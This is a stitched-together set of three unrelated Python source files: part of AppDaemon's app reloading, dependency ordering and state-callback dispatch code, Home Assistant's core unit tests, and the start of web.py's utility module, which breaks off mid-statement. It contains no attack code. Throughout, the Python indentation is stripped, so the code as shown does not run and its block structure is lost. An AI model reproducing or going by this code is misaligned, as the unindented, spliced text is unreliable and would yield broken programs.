for gm in utils.single_or_list(self.app_config["global_modules"]):
if gm == self.get_module_from_path(module["name"]):
for app in self.apps_per_global_module(gm):
if module["reload"]:
apps["term"][app] = 1
apps["init"][app] = 1
if plugin is not None:
self.log("INFO", "Processing restart for {}".format(plugin))
# This is a restart of one of the plugins so check which apps need to be restarted
for app in self.app_config:
reload = False
if app == "global_modules":
continue
if "plugin" in self.app_config[app]:
for this_plugin in utils.single_or_list(self.app_config[app]["plugin"]):
if this_plugin == plugin:
# We got a match so do the reload
reload = True
break
elif plugin == "__ALL__":
reload = True
break
else:
# No plugin dependency specified, reload to err on the side of caution
reload = True
if reload is True:
apps["term"][app] = 1
apps["init"][app] = 1
# Terminate apps
if apps is not None and apps["term"]:
prio_apps = self.get_app_deps_and_prios(apps["term"])
for app in sorted(prio_apps, key=prio_apps.get, reverse=True):
try:
self.log("INFO", "Terminating {}".format(app))
self.term_object(app)
except:
self.err("WARNING", '-' * 60)
self.err("WARNING", "Unexpected error terminating app: {}:".format(app))
self.err("WARNING", '-' * 60)
self.err("WARNING", traceback.format_exc())
self.err("WARNING", '-' * 60)
if self.errfile != "STDERR" and self.logfile != "STDOUT":
self.log("WARNING", "Logged an error to {}".format(self.errfile))
# Load/reload modules
for mod in modules:
try:
self.read_app(mod["name"], mod["reload"])
except:
self.err("WARNING", '-' * 60)
self.err("WARNING", "Unexpected error loading module: {}:".format(mod["name"]))
self.err("WARNING", '-' * 60)
self.err("WARNING", traceback.format_exc())
self.err("WARNING", '-' * 60)
if self.errfile != "STDERR" and self.logfile != "STDOUT":
self.log("WARNING", "Unexpected error loading module: {}:".format(mod["name"]))
self.log("WARNING", "Removing associated apps:")
module = self.get_module_from_path(mod["name"])
for app in self.app_config:
if self.app_config[app]["module"] == module:
if apps["init"] and app in apps["init"]:
del apps["init"][app]
self.log("WARNING", "{}".format(app))
if apps is not None and apps["init"]:
prio_apps = self.get_app_deps_and_prios(apps["init"])
# Initialize Apps
for app in sorted(prio_apps, key=prio_apps.get):
try:
self.init_object(app)
except:
self.err("WARNING", '-' * 60)
self.err("WARNING", "Unexpected error initializing app: {}:".format(app))
self.err("WARNING", '-' * 60)
self.err("WARNING", traceback.format_exc())
self.err("WARNING", '-' * 60)
if self.errfile != "STDERR" and self.logfile != "STDOUT":
self.log("WARNING", "Logged an error to {}".format(self.errfile))
if self.check_app_updates_profile is True:
pr.disable()
s = io.StringIO()
sortby = 'cumulative'
ps = pstats.Stats(pr, stream=s).sort_stats(sortby)
ps.print_stats()
self.check_app_updates_profile_stats = s.getvalue()
def get_app_deps_and_prios(self, applist):
# Build a list of modules and their dependencies
deplist = []
for app in applist:
if app not in deplist:
deplist.append(app)
self.get_dependent_apps(app, deplist)
# Need to gove the topological sort a full list of apps or it will fail
full_list = list(self.app_config.keys())
deps = []
for app in full_list:
dependees = []
if "dependencies" in self.app_config[app]:
for dep in utils.single_or_list(self.app_config[app]["dependencies"]):
if dep in self.app_config:
dependees.append(dep)
else:
self.log("WARNING", "Unable to find app {} in dependencies for {}".format(dep, app))
self.log("WARNING", "Ignoring app {}".format(app))
deps.append((app, dependees))
prio_apps = {}
prio = float(50.1)
try:
for app in self.topological_sort(deps):
if "dependencies" in self.app_config[app] or self.app_has_dependents(app):
prio_apps[app] = prio
prio += float(0.0001)
else:
if "priority" in self.app_config[app]:
prio_apps[app] = float(self.app_config[app]["priority"])
else:
prio_apps[app] = float(50)
except ValueError:
pass
# now we remove the ones we aren't interested in
final_apps = {}
for app in prio_apps:
if app in deplist:
final_apps[app] = prio_apps[app]
return final_apps
def app_has_dependents(self, name):
for app in self.app_config:
if "dependencies" in self.app_config[app]:
for dep in utils.single_or_list(self.app_config[app]["dependencies"]):
if dep == name:
return True
return False
def get_dependent_apps(self, dependee, deps):
for app in self.app_config:
if "dependencies" in self.app_config[app]:
for dep in utils.single_or_list(self.app_config[app]["dependencies"]):
#print("app= {} dep = {}, dependee = {} deps = {}".format(app, dep, dependee, deps))
if dep == dependee and app not in deps:
deps.append(app)
new_deps = self.get_dependent_apps(app, deps)
if new_deps is not None:
deps.append(new_deps)
def topological_sort(self, source):
pending = [(name, set(deps)) for name, deps in source] # copy deps so we can modify set in-place
emitted = []
while pending:
next_pending = []
next_emitted = []
for entry in pending:
name, deps = entry
deps.difference_update(emitted) # remove deps we emitted last pass
if deps: # still has deps? recheck during next pass
next_pending.append(entry)
else: # no more deps? time to emit
yield name
emitted.append(name) # <-- not required, but helps preserve original ordering
next_emitted.append(name) # remember what we emitted for difference_update() in next pass
if not next_emitted:
# all entries have unmet deps, we have cyclic redundancies
# since we already know all deps are correct
self.log("WARNING", "Cyclic or missing app dependencies detected")
for pend in next_pending:
deps = ""
for dep in pend[1]:
deps += "{} ".format(dep)
self.log("WARNING", "{} depends on {}".format(pend[0], deps))
raise ValueError("cyclic dependancy detected")
pending = next_pending
emitted = next_emitted
def apps_per_module(self, module):
apps = []
for app in self.app_config:
if app != "global_modules" and self.app_config[app]["module"] == module:
apps.append(app)
return apps
def apps_per_global_module(self, module):
apps = []
for app in self.app_config:
if "global_dependencies" in self.app_config[app]:
for gm in utils.single_or_list(self.app_config[app]["global_dependencies"]):
if gm == module:
apps.append(app)
return apps
#
# State Updates
#
def check_and_disapatch(self, name, funcref, entity, attribute, new_state,
old_state, cold, cnew, kwargs, uuid_):
kwargs["handle"] = uuid_
if attribute == "all":
with self.objects_lock:
self.dispatch_worker(name, {
"name": name,
"id": self.objects[name]["id"],
"type": "attr",
"function": funcref,
"attribute": attribute,
"entity": entity,
"new_state": new_state,
"old_state": old_state,
"kwargs": kwargs,
})
else:
if old_state is None:
old = None
else:
if attribute in old_state:
old = old_state[attribute]
elif 'attributes' in old_state and attribute in old_state['attributes']:
old = old_state['attributes'][attribute]
else:
old = None
if new_state is None:
new = None
else:
if attribute in new_state:
new = new_state[attribute]
elif 'attributes' in new_state and attribute in new_state['attributes']:
new = new_state['attributes'][attribute]
else:
new = None
if (cold is None or cold == old) and (cnew is None or cnew == new):
if "duration" in kwargs:
# Set a timer
exec_time = self.get_now_ts() + int(kwargs["duration"])
kwargs["_duration"] = self.insert_schedule(
name, exec_time, funcref, False, None,
entity=entity,
attribute=attribute,
old_state=old,
new_state=new, **kwargs
)
else:
# Do it now
with self.objects_lock:
self.dispatch_worker(name, {
"name": name,
"id": self.objects[name]["id"],
"type": "attr",
"function": funcref,
"attribute": attribute,
"entity": entity,
"new_state": new,
"old_state": old,
"kwargs": kwargs
})
else:
if "_duration" in kwargs:
# cancel timer
self.cancel_timer(name, kwargs["_duration"])
def process_state_change(self, namespace, state):
data = state["data"]
entity_id = data['entity_id']
self.log("DEBUG", data)
device, entity = entity_id.split(".")
# Process state callbacks
removes = []
with self.callbacks_lock:
for name in self.callbacks.keys():
for uuid_ in self.callbacks[name]:
callback = self.callbacks[name][uuid_]
if callback["type"] == "state" and (callback["namespace"] == namespace or callback["namespace"] == "global" or namespace == "global"):
cdevice = None
centity = None
if callback["entity"] is not None:
if "." not in callback["entity"]:
cdevice = callback["entity"]
centity = None
else:
cdevice, centity = callback["entity"].split(".")
if callback["kwargs"].get("attribute") is None:
cattribute = "state"
else:
cattribute = callback["kwargs"].get("attribute")
cold = callback["kwargs"].get("old")
cnew = callback["kwargs"].get("new")
if cdevice is None:
self.check_and_disapatch(
name, callback["function"], entity_id,
cattribute,
data['new_state'],
data['old_state'],
cold, cnew,
callback["kwargs"],
uuid_
)
elif centity is None:
if device == cdevice:
self.check_and_disapatch(
name, callback["function"], entity_id,
cattribute,
data['new_state'],
data['old_state'],
cold, cnew,
callback["kwargs"],
uuid_
)
elif device == cdevice and entity == centity:
self.check_and_disapatch(
name, callback["function"], entity_id,
cattribute,
data['new_state'],
data['old_state'], cold,
cnew,
callback["kwargs"],
uuid_
)
# Remove the callback if appropriate
remove = callback["kwargs"].get("oneshot", False)
if remove:
removes.append({"name": callback["name"], "uuid": callback["kwargs"]["handle"]})
for remove in removes:
#print(remove)
self.cancel_state_callback(remove["uuid"], remove["name"])
async def state_update(self, namespace, data):
try:
self.log(
"DEBUG",
"Event type:{}:".format(data['event_type'])
)
self.log( "DEBUG", data["data"])
if data['event_type'] == "state_changed":
entity_id = data['data']['entity_id']
# First update our global state
with self.state_lock:
self.state[namespace][entity_id] = data['data']['new_state']
if self.apps is True:
# Process state changed message
if data['event_type'] == "state_changed":
self.process_state_change(namespace, data)
else:
# Process non-state callbacks
self.process_event(namespace, data)
# Update dashboards
if self.dashboard is not None:
await self.dashboard.ws_update(namespace, data)
except:
self.log("WARNING", '-' * 60)
self.log("WARNING", "Unexpected error during state_update()")
self.log("WARNING", '-' * 60)
self.log("WARNING", traceback.format_exc())
self.log("WARNING", '-' * 60)
#
# Event Update
#
def process_event(self, namespace, data):
with self.callbacks_lock:
for name in self.callbacks.keys():
for uuid_ in self.callbacks[name]:
callback = self.callbacks[name][uuid_]
if callback["namespace"] == namespace or callback["namespace"] == "global" or namespace == "global":
if "event" in callback and (
callback["event"] is None
or data['event_type'] == callback["event"]):
# Check any filters
_run = True
for key in callback["kwargs"]:
if key in data["data"] and callback["kwargs"][key] != \
data["data"][key]:
_run = False
if _run:
with self.objects_lock:
self.dispatch_worker(name, {
"name": name,
"id": self.objects[name]["id"],
"type": "event",
"event": data['event_type'],
"function": callback["function"],
"data": data["data"],
"kwargs": callback["kwargs"]
})
#
# Plugin Management
#
def get_plugin(self, name):
if name in self.plugin_objs:
return self.plugin_objs[name]
else:
return None
def get_plugin_meta(self, namespace):
for name in self.plugins:
if "namespace" not in self.plugins[name] and namespace == "default":
return self.plugin_meta[namespace]
elif "namespace" in self.plugins[name] and self.plugins[name]["namespace"] == namespace:
return self.plugin_meta[namespace]
else:
return None
#
# Utilities
#
def sanitize_state_kwargs(self, app, kwargs):
kwargs_copy = kwargs.copy()
return self._sanitize_kwargs(kwargs_copy, [
"old", "new", "attribute", "duration", "state",
"entity", "_duration", "old_state", "new_state",
"oneshot"
] + app.list_constraints())
def sanitize_timer_kwargs(self, app, kwargs):
kwargs_copy = kwargs.copy()
return self._sanitize_kwargs(kwargs_copy, [
"interval", "constrain_days", "constrain_input_boolean",
] + app.list_constraints())
def _sanitize_kwargs(self, kwargs, keys):
for key in keys:
if key in kwargs:
del kwargs[key]
return kwargs
def log(self, level, message, name="AppDaemon"):
if not self.realtime:
ts = self.get_now()
else:
ts = None
utils.log(self.logger, level, message, name, ts)
def err(self, level, message, name="AppDaemon"):
if not self.realtime:
ts = self.get_now()
else:
ts = None
utils.log(self.error, level, message, name, ts)
def diag(self, level, message, name="AppDaemon"):
if not self.realtime:
ts = self.get_now()
else:
ts = None
utils.log(self.diagnostic, level, message, name, ts)
def register_dashboard(self, dash):
self.dashboard = dash
async def dispatch_app_by_name(self, name, args):
with self.endpoints_lock:
callback = None
for app in self.endpoints:
for handle in self.endpoints[app]:
if self.endpoints[app][handle]["name"] == name:
callback = self.endpoints[app][handle]["callback"]
if callback is not None:
return await utils.run_in_executor(self.loop, self.executor, callback, args)
else:
return '', 404
|
test_core.py
|
"""Test to verify that Home Assistant core works."""
# pylint: disable=protected-access,too-many-public-methods
# pylint: disable=too-few-public-methods
import os
import signal
import unittest
from unittest.mock import patch
import time
import threading
from datetime import datetime, timedelta
import pytz
import homeassistant.core as ha
from homeassistant.exceptions import (
HomeAssistantError, InvalidEntityFormatError)
import homeassistant.util.dt as dt_util
from homeassistant.const import (
__version__, EVENT_HOMEASSISTANT_START, EVENT_HOMEASSISTANT_STOP,
EVENT_STATE_CHANGED, ATTR_FRIENDLY_NAME, TEMP_CELCIUS,
TEMP_FAHRENHEIT)
from tests.common import get_test_home_assistant
PST = pytz.timezone('America/Los_Angeles')
class TestHomeAssistant(unittest.TestCase):
"""Test the Home Assistant core classes."""
def setUp(self): # pylint: disable=invalid-name
"""Setup things to be run when tests are started."""
self.hass = get_test_home_assistant()
self.hass.states.set("light.Bowl", "on")
self.hass.states.set("switch.AC", "off")
def tearDown(self): # pylint: disable=invalid-name
"""Stop everything that was started."""
try:
self.hass.stop()
except HomeAssistantError:
# Already stopped after the block till stopped test
pass
def test_start(self):
"""Start the test."""
calls = []
self.hass.bus.listen_once(EVENT_HOMEASSISTANT_START,
lambda event: calls.append(1))
self.hass.start()
self.hass.pool.block_till_done()
self.assertEqual(1, len(calls))
# @patch('homeassistant.core.time.sleep')
def test_block_till_stoped(self):
"""Test if we can block till stop service is called."""
with patch('time.sleep'):
blocking_thread = threading.Thread(
target=self.hass.block_till_stopped)
self.assertFalse(blocking_thread.is_alive())
blocking_thread.start()
self.assertTrue(blocking_thread.is_alive())
self.hass.services.call(ha.DOMAIN, ha.SERVICE_HOMEASSISTANT_STOP)
self.hass.pool.block_till_done()
# Wait for thread to stop
for _ in range(20):
if not blocking_thread.is_alive():
break
time.sleep(0.05)
self.assertFalse(blocking_thread.is_alive())
def test_stopping_with_sigterm(self):
"""Test for stopping with sigterm."""
calls = []
self.hass.bus.listen_once(EVENT_HOMEASSISTANT_STOP,
lambda event: calls.append(1))
def send_sigterm(length):
"""Send sigterm."""
os.kill(os.getpid(), signal.SIGTERM)
with patch('homeassistant.core.time.sleep', send_sigterm):
self.hass.block_till_stopped()
self.assertEqual(1, len(calls))
class TestEvent(unittest.TestCase):
"""A Test Event class."""
def test_eq(self):
"""Test events."""
now = dt_util.utcnow()
data = {'some': 'attr'}
event1, event2 = [
ha.Event('some_type', data, time_fired=now)
for _ in range(2)
]
self.assertEqual(event1, event2)
def test_repr(self):
"""Test that repr method works."""
self.assertEqual(
"<Event TestEvent[L]>",
str(ha.Event("TestEvent")))
self.assertEqual(
"<Event TestEvent[R]: beer=nice>",
str(ha.Event("TestEvent",
{"beer": "nice"},
ha.EventOrigin.remote)))
def test_as_dict(self):
"""Test as dictionary."""
event_type = 'some_type'
now = dt_util.utcnow()
data = {'some': 'attr'}
event = ha.Event(event_type, data, ha.EventOrigin.local, now)
expected = {
'event_type': event_type,
'data': data,
'origin': 'LOCAL',
'time_fired': dt_util.datetime_to_str(now),
}
self.assertEqual(expected, event.as_dict())
class TestEventBus(unittest.TestCase):
"""Test EventBus methods."""
def setUp(self): # pylint: disable=invalid-name
"""Setup things to be run when tests are started."""
self.bus = ha.EventBus(ha.create_worker_pool(0))
self.bus.listen('test_event', lambda x: len)
def tearDown(self): # pylint: disable=invalid-name
"""Stop down stuff we started."""
self.bus._pool.stop()
def test_add_remove_listener(self):
"""Test remove_listener method."""
self.bus._pool.add_worker()
old_count = len(self.bus.listeners)
def listener(_): pass
self.bus.listen('test', listener)
self.assertEqual(old_count + 1, len(self.bus.listeners))
# Try deleting a non registered listener, nothing should happen
self.bus.remove_listener('test', lambda x: len)
# Remove listener
self.bus.remove_listener('test', listener)
self.assertEqual(old_count, len(self.bus.listeners))
# Try deleting listener while category doesn't exist either
self.bus.remove_listener('test', listener)
def test_listen_once_event(self):
"""Test listen_once_event method."""
runs = []
self.bus.listen_once('test_event', lambda x: runs.append(1))
self.bus.fire('test_event')
# Second time it should not increase runs
self.bus.fire('test_event')
self.bus._pool.add_worker()
self.bus._pool.block_till_done()
self.assertEqual(1, len(runs))
class TestState(unittest.TestCase):
"""Test State methods."""
def test_init(self):
"""Test state.init."""
self.assertRaises(
InvalidEntityFormatError, ha.State,
'invalid_entity_format', 'test_state')
def test_domain(self):
"""Test domain."""
state = ha.State('some_domain.hello', 'world')
self.assertEqual('some_domain', state.domain)
def test_object_id(self):
"""Test object ID."""
state = ha.State('domain.hello', 'world')
self.assertEqual('hello', state.object_id)
def test_name_if_no_friendly_name_attr(self):
"""Test if there is no friendly name."""
state = ha.State('domain.hello_world', 'world')
self.assertEqual('hello world', state.name)
def test_name_if_friendly_name_attr(self):
"""Test if there is a friendly name."""
name = 'Some Unique Name'
state = ha.State('domain.hello_world', 'world',
{ATTR_FRIENDLY_NAME: name})
self.assertEqual(name, state.name)
def test_dict_conversion(self):
"""Test conversion of dict."""
state = ha.State('domain.hello', 'world', {'some': 'attr'})
self.assertEqual(state, ha.State.from_dict(state.as_dict()))
def test_dict_conversion_with_wrong_data(self):
"""Test conversion with wrong data."""
self.assertIsNone(ha.State.from_dict(None))
self.assertIsNone(ha.State.from_dict({'state': 'yes'}))
self.assertIsNone(ha.State.from_dict({'entity_id': 'yes'}))
def test_repr(self):
"""Test state.repr."""
self.assertEqual("<state happy.happy=on @ 12:00:00 08-12-1984>",
str(ha.State(
"happy.happy", "on",
last_changed=datetime(1984, 12, 8, 12, 0, 0))))
self.assertEqual(
"<state happy.happy=on; brightness=144 @ 12:00:00 08-12-1984>",
str(ha.State("happy.happy", "on", {"brightness": 144},
datetime(1984, 12, 8, 12, 0, 0))))
class TestStateMachine(unittest.TestCase):
"""Test State machine methods."""
def setUp(self): # pylint: disable=invalid-name
"""Setup things to be run when tests are started."""
self.pool = ha.create_worker_pool(0)
self.bus = ha.EventBus(self.pool)
self.states = ha.StateMachine(self.bus)
self.states.set("light.Bowl", "on")
self.states.set("switch.AC", "off")
def tearDown(self): # pylint: disable=invalid-name
"""Stop down stuff we started."""
self.pool.stop()
def test_is_state(self):
"""Test is_state method."""
self.assertTrue(self.states.is_state('light.Bowl', 'on'))
self.assertFalse(self.states.is_state('light.Bowl', 'off'))
self.assertFalse(self.states.is_state('light.Non_existing', 'on'))
def test_is_state_attr(self):
"""Test is_state_attr method."""
self.states.set("light.Bowl", "on", {"brightness": 100})
self.assertTrue(
self.states.is_state_attr('light.Bowl', 'brightness', 100))
self.assertFalse(
self.states.is_state_attr('light.Bowl', 'friendly_name', 200))
self.assertFalse(
self.states.is_state_attr('light.Bowl', 'friendly_name', 'Bowl'))
self.assertFalse(
self.states.is_state_attr('light.Non_existing', 'brightness', 100))
def test_entity_ids(self):
"""Test get_entity_ids method."""
ent_ids = self.states.entity_ids()
self.assertEqual(2, len(ent_ids))
self.assertTrue('light.bowl' in ent_ids)
self.assertTrue('switch.ac' in ent_ids)
ent_ids = self.states.entity_ids('light')
self.assertEqual(1, len(ent_ids))
self.assertTrue('light.bowl' in ent_ids)
def test_all(self):
"""Test everything."""
states = sorted(state.entity_id for state in self.states.all())
self.assertEqual(['light.bowl', 'switch.ac'], states)
def test_remove(self):
"""Test remove method."""
self.pool.add_worker()
events = []
self.bus.listen(EVENT_STATE_CHANGED,
lambda event: events.append(event))
self.assertIn('light.bowl', self.states.entity_ids())
self.assertTrue(self.states.remove('light.bowl'))
self.pool.block_till_done()
self.assertNotIn('light.bowl', self.states.entity_ids())
self.assertEqual(1, len(events))
self.assertEqual('light.bowl', events[0].data.get('entity_id'))
self.assertIsNotNone(events[0].data.get('old_state'))
self.assertEqual('light.bowl', events[0].data['old_state'].entity_id)
self.assertIsNone(events[0].data.get('new_state'))
# If it does not exist, we should get False
self.assertFalse(self.states.remove('light.Bowl'))
self.pool.block_till_done()
self.assertEqual(1, len(events))
def test_case_insensitivty(self):
"""Test insensitivty."""
self.pool.add_worker()
runs = []
self.bus.listen(EVENT_STATE_CHANGED, lambda event: runs.append(event))
self.states.set('light.BOWL', 'off')
self.bus._pool.block_till_done()
self.assertTrue(self.states.is_state('light.bowl', 'off'))
self.assertEqual(1, len(runs))
def test_last_changed_not_updated_on_same_state(self):
"""Test to not update the existing, same state."""
state = self.states.get('light.Bowl')
future = dt_util.utcnow() + timedelta(hours=10)
with patch('homeassistant.util.dt.utcnow', return_value=future):
self.states.set("light.Bowl", "on", {'attr': 'triggers_change'})
self.assertEqual(state.last_changed,
self.states.get('light.Bowl').last_changed)
class TestServiceCall(unittest.TestCase):
"""Test ServiceCall class."""
def test_repr(self):
"""Test repr method."""
self.assertEqual(
"<ServiceCall homeassistant.start>",
str(ha.ServiceCall('homeassistant', 'start')))
self.assertEqual(
"<ServiceCall homeassistant.start: fast=yes>",
str(ha.ServiceCall('homeassistant', 'start', {"fast": "yes"})))
class TestServiceRegistry(unittest.TestCase):
"""Test ServicerRegistry methods."""
def setUp(self): # pylint: disable=invalid-name
"""Setup things to be run when tests are started."""
self.pool = ha.create_worker_pool(0)
self.bus = ha.EventBus(self.pool)
self.services = ha.ServiceRegistry(self.bus, self.pool)
self.services.register("test_domain", "test_service", lambda x: None)
def tearDown(self): # pylint: disable=invalid-name
"""Stop down stuff we started."""
if self.pool.worker_count:
self.pool.stop()
def test_has_service(self):
"""Test has_service method."""
self.assertTrue(
self.services.has_service("test_domain", "test_service"))
self.assertFalse(
self.services.has_service("test_domain", "non_existing"))
self.assertFalse(
self.services.has_service("non_existing", "test_service"))
def test_services(self):
"""Test services."""
expected = {
'test_domain': {'test_service': {'description': '', 'fields': {}}}
}
self.assertEqual(expected, self.services.services)
def test_call_with_blocking_done_in_time(self):
"""Test call with blocking."""
self.pool.add_worker()
self.pool.add_worker()
calls = []
self.services.register("test_domain", "register_calls",
lambda x: calls.append(1))
self.assertTrue(
self.services.call('test_domain', 'register_calls', blocking=True))
self.assertEqual(1, len(calls))
def test_call_with_blocking_not_done_in_time(self):
"""Test with blocking."""
calls = []
self.services.register("test_domain", "register_calls",
lambda x: calls.append(1))
orig_limit = ha.SERVICE_CALL_LIMIT
ha.SERVICE_CALL_LIMIT = 0.01
self.assertFalse(
self.services.call('test_domain', 'register_calls', blocking=True))
self.assertEqual(0, len(calls))
ha.SERVICE_CALL_LIMIT = orig_limit
def test_call_non_existing_with_blocking(self):
"""Test non-existing with blocking."""
self.pool.add_worker()
self.pool.add_worker()
orig_limit = ha.SERVICE_CALL_LIMIT
ha.SERVICE_CALL_LIMIT = 0.01
self.assertFalse(
self.services.call('test_domain', 'i_do_not_exist', blocking=True))
ha.SERVICE_CALL_LIMIT = orig_limit
class TestConfig(unittest.TestCase):
"""Test configuration methods."""
def setUp(self): # pylint: disable=invalid-name
"""Setup things to be run when tests are started."""
self.config = ha.Config()
def test_config_dir_set_correct(self):
"""Test config dir set correct."""
data_dir = os.getenv('APPDATA') if os.name == "nt" \
else os.path.expanduser('~')
self.assertEqual(os.path.join(data_dir, ".homeassistant"),
self.config.config_dir)
def test_path_with_file(self):
"""Test get_config_path method."""
data_dir = os.getenv('APPDATA') if os.name == "nt" \
else os.path.expanduser('~')
self.assertEqual(os.path.join(data_dir, ".homeassistant", "test.conf"),
self.config.path("test.conf"))
def test_path_with_dir_and_file(self):
"""Test get_config_path method."""
data_dir = os.getenv('APPDATA') if os.name == "nt" \
else os.path.expanduser('~')
self.assertEqual(
os.path.join(data_dir, ".homeassistant", "dir", "test.conf"),
self.config.path("dir", "test.conf"))
def test_temperature_not_convert_if_no_preference(self):
"""No unit conversion to happen if no preference."""
self.assertEqual(
(25, TEMP_CELCIUS),
self.config.temperature(25, TEMP_CELCIUS))
self.assertEqual(
(80, TEMP_FAHRENHEIT),
self.config.temperature(80, TEMP_FAHRENHEIT))
def test_temperature_not_convert_if_invalid_value(self):
"""No unit conversion to happen if no preference."""
self.config.temperature_unit = TEMP_FAHRENHEIT
self.assertEqual(
('25a', TEMP_CELCIUS),
self.config.temperature('25a', TEMP_CELCIUS))
def test_temperature_not_convert_if_invalid_unit(self):
"""No unit conversion to happen if no preference."""
self.assertEqual(
(25, 'Invalid unit'),
self.config.temperature(25, 'Invalid unit'))
def test_temperature_to_convert_to_celcius(self):
"""Test temperature conversion to celsius."""
self.config.temperature_unit = TEMP_CELCIUS
self.assertEqual(
(25, TEMP_CELCIUS),
self.config.temperature(25, TEMP_CELCIUS))
self.assertEqual(
(26.7, TEMP_CELCIUS),
self.config.temperature(80, TEMP_FAHRENHEIT))
def test_temperature_to_convert_to_fahrenheit(self):
"""Test temperature conversion to fahrenheit."""
self.config.temperature_unit = TEMP_FAHRENHEIT
self.assertEqual(
(77, TEMP_FAHRENHEIT),
self.config.temperature(25, TEMP_CELCIUS))
self.assertEqual(
(80, TEMP_FAHRENHEIT),
self.config.temperature(80, TEMP_FAHRENHEIT))
def test_as_dict(self):
"""Test as dict."""
expected = {
'latitude': None,
'longitude': None,
'temperature_unit': None,
'location_name': None,
'time_zone': 'UTC',
'components': [],
'version': __version__,
}
self.assertEqual(expected, self.config.as_dict())
class TestWorkerPool(unittest.TestCase):
"""Test WorkerPool methods."""
def test_exception_during_job(self):
"""Test exception during a job."""
pool = ha.create_worker_pool(1)
def malicious_job(_):
raise Exception("Test breaking worker pool")
calls = []
def register_call(_):
calls.append(1)
pool.add_job(ha.JobPriority.EVENT_DEFAULT, (malicious_job, None))
pool.add_job(ha.JobPriority.EVENT_DEFAULT, (register_call, None))
pool.block_till_done()
self.assertEqual(1, len(calls))
|
utils.py
|
#!/usr/bin/env python
"""
General Utilities
(part of web.py)
"""
__all__ = [
"Storage", "storage", "storify",
"Counter", "counter",
"iters",
"rstrips", "lstrips", "strips",
"safeunicode", "safestr", "utf8",
"TimeoutError", "timelimit",
"Memoize", "memoize",
"re_compile", "re_subm",
"group", "uniq", "iterview",
"IterBetter", "iterbetter",
"safeiter", "safewrite",
"dictreverse", "dictfind", "dictfindall", "dictincr", "dictadd",
"requeue", "restack",
"listget", "intget", "datestr",
"numify", "denumify", "commify", "dateify",
"nthstr", "cond",
"CaptureStdout", "capturestdout", "Profile", "profile",
"tryall",
"ThreadedDict", "threadeddict",
"autoassign",
"to36",
"safemarkdown",
"sendmail"
]
import re, sys, time, threading, itertools, traceback, os
try:
import subprocess
except ImportError:
subprocess = None
try: import datetime
except ImportError: pass
try: set
except NameError:
from sets import Set as set
try:
from threading import local as threadlocal
except ImportError:
from python23 import threadlocal
class Storage(dict):
"""
A Storage object is like a dictionary except `obj.foo` can be used
in addition to `obj['foo']`.
>>> o = storage(a=1)
>>> o.a
1
>>> o['a']
1
>>> o.a = 2
>>> o['a']
2
>>> del o.a
>>> o.a
Traceback (most recent call last):
...
AttributeError: 'a'
"""
def __getattr__(self, key):
try:
return self[key]
except KeyError, k:
raise AttributeError, k
def __setattr__(self, key, value):
self[key] = value
def __delattr__(self, key):
try:
del self[key]
except KeyError, k:
raise AttributeError, k
def __repr__(self):
return '<Storage ' + dict.__repr__(self) + '>'
storage = Storage
def storify(mapping, *requireds, **defaults):
"""
Creates a `storage` object from dictionary `mapping`, raising `KeyError` if
d doesn't have all of the keys in `requireds` and using the default
values for keys found in `defaults`.
For example, `storify({'a':1, 'c':3}, b=2, c=0)` will return the equivalent of
`storage({'a':1, 'b':2, 'c':3})`.
If a `storify` value is a list (e.g. multiple values in a form submission),
`storify` returns the last element of the list, unless the key appears in
`defaults` as a list. Thus:
>>> storify({'a':[1, 2]}).a
2
>>> storify({'a':[1, 2]}, a=[]).a
[1, 2]
>>> storify({'a':1}, a=[]).a
[1]
>>> storify({}, a=[]).a
[]
Similarly, if the value has a `value` attribute, `storify will return _its_
value, unless the key appears in `defaults` as a dictionary.
>>> storify({'a':storage(value=1)}).a
1
>>> storify({'a':storage(value=1)}, a={}).a
<Storage {'value': 1}>
>>> storify({}, a={}).a
{}
Optionally, keyword parameter `_unicode` can be passed to convert all values to unicode.
>>> storify({'x': 'a'}, _unicode=True)
<Storage {'x': u'a'}>
>>> storify({'x': storage(value='a')}, x={}, _unicode=True)
<Storage {'x': <Storage {'value': 'a'}>}>
>>> storify({'x': storage(value='a')}, _unicode=True)
<Storage {'x': u'a'}>
"""
_unicode = defaults.pop('_unicode', False)
def unicodify(s):
if _unicode and isinstance(s, str): return safeunicode(s)
else: return s
def getvalue(x):
if hasattr(x, 'file') and hasattr(x, 'value'):
return x.value
elif hasattr(x, 'value'):
return unicodify(x.value)
else:
return unicodify(x)
stor = Storage()
for key in requireds + tuple(mapping.keys()):
value = mapping[key]
if isinstance(value, list):
if isinstance(defaults.get(key), list):
value = [getvalue(x) for x in value]
else:
value = value[-1]
if not isinstance(defaults.get(key), dict):
value = getvalue(value)
if isinstance(defaults.get(key), list) and not isinstance(value, list):
value = [value]
setattr(stor, key, value)
for (key, value) in defaults.iteritems():
result = value
if hasattr(stor, key):
result = stor[key]
if value == () and not isinstance(result, tuple):
result = (result,)
setattr(stor, key, result)
return stor
class Counter(storage):
"""Keeps count of how many times something is added.
>>> c = counter()
>>> c.add('x')
>>> c.add('x')
>>> c.add('x')
>>> c.add('x')
>>> c.add('x')
>>> c.add('y')
>>> c
<Counter {'y': 1, 'x': 5}>
>>> c.most()
['x']
"""
def add(self, n):
self.setdefault(n, 0)
self[n] += 1
def most(self):
"""Returns the keys with maximum count."""
m = max(self.itervalues())
return [k for k, v in self.iteritems() if v == m]
def least(self):
"""Returns the keys with mininum count."""
m = min(self.itervalues())
return [k for k, v in self.iteritems() if v == m]
def percent(self, key):
"""Returns what percentage a certain key is of all entries.
>>> c = counter()
>>> c.add('x')
>>> c.add('x')
>>> c.add('x')
>>> c.add('y')
>>> c.percent('x')
0.75
>>> c.percent('y')
0.25
"""
return float(self[key])/sum(self.values())
def sorted_keys(self):
"""Returns keys sorted by value.
>>> c = counter()
>>> c.add('x')
>>> c.add('x')
>>> c.add('y')
>>> c.sorted_keys()
['x', 'y']
"""
return sorted(self.keys(), key=lambda k: self[k], reverse=True)
def sorted_values(self):
"""Returns values sorted by value.
>>> c = counter()
>>> c.add('x')
>>> c.add('x')
>>> c.add('y')
>>> c.sorted_values()
[2, 1]
"""
return [self[k] for k in self.sorted_keys()]
def sorted_items(self):
"""Returns items sorted by value.
>>> c = counter()
>>> c.add('x')
>>> c.add('x')
>>> c.add('y')
>>> c.sorted_items()
[('x', 2), ('y', 1)]
"""
return [(k, self[k]) for k in self.sorted_keys()]
def __repr__(self):
return '<Counter ' + dict.__repr__(self) + '>'
counter = Counter
iters = [list, tuple]
import __builtin__
if hasattr(__builtin__, 'set'):
iters.append(set)
if hasattr(__builtin__, 'frozenset'):
iters.append(set)
if sys.version_info < (2,6): # sets module deprecated in 2.6
try:
from sets import Set
iters.append(Set)
except ImportError:
